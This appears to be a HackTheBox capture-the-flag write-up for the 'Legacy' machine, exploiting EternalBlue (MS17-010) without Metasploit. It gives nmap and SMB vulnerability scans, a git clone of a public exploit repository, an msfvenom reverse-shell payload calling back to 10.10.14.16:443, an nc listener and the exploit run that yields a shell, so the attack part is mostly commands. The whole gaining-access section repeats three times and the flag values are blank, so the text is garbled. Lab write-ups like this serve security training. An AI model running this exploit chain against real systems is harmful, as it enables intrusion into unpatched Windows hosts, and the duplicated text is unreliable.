Legacy- HackTheBox Without Metasploit
This machine is going to be a windows system that is vulnerable to an exploit named called EternalBlue.
Machine IP 10.10.10.4
Let’s start the machine.
Scanning
first, as we always used to do, scanning all ports with default script and look for versions for the target machine. and below we can see the results of it.
nmap -A -T4 -p- 10.10.10.4
here we can see only the samba server is available but it is not disclosing the version of it. so using NSE script in Nmap for samba server
nmap --script smb-vuln* -p 137,139,445 10.10.10.4
here we can see it is VULNERABLE for remote code execution and it has a CVE:2017–0144 and version is MS17–010.
doing google you will get many exploits available for this CVE.
Here we are going to use a GitHub repo which has all sorts of Eternalblue exploit as perversion wise. First, download the clone the exploit repo from Github.
git clone https://github.com/helviojunior/MS17-010.git
2. Gaining Access
Use msfvenom to generate payload it is allowed in OSCP unless you are not using meterpreter.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.16 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
to use the exploit we need a payload which we have made using MSFvenom,
now we first need a listener on port 443 nc -nlvp 443and run the exploit as shown below
TAB-1
python send_and_execute.py 10.10.10.4 ms17-010.exe
we can see system information with as shown below
C:\> systeminfo
now the goal is to get root and user flag, but as I said earlier we are going to go beyond the root flag.
we know very well about both flags are available and now accessible because we have high privileges.
User Flag ~
Root Flag ~
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.16 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
to use the exploit we need a payload which we have made using MSFvenom,
now we first need a listener on port 443 nc -nlvp 443and run the exploit as shown below
TAB-1
python send_and_execute.py 10.10.10.4 ms17-010.exe
we can see system information with as shown below
C:\> systeminfo
now the goal is to get root and user flag, but as I said earlier we are going to go beyond the root flag.
we know very well about both flags are available and now accessible because we have high privileges.
User Flag ~
Root Flag ~
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.16 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
to use the exploit we need a payload which we have made using MSFvenom,
now we first need a listener on port 443 nc -nlvp 443and run the exploit as shown below
TAB-1
python send_and_execute.py 10.10.10.4 ms17-010.exe
we can see system information with as shown below
C:\> systeminfo
now the goal is to get root and user flag, but as I said earlier we are going to go beyond the root flag.
we know very well about both flags are available and now accessible because we have high privileges.
User Flag ~
Root Flag ~
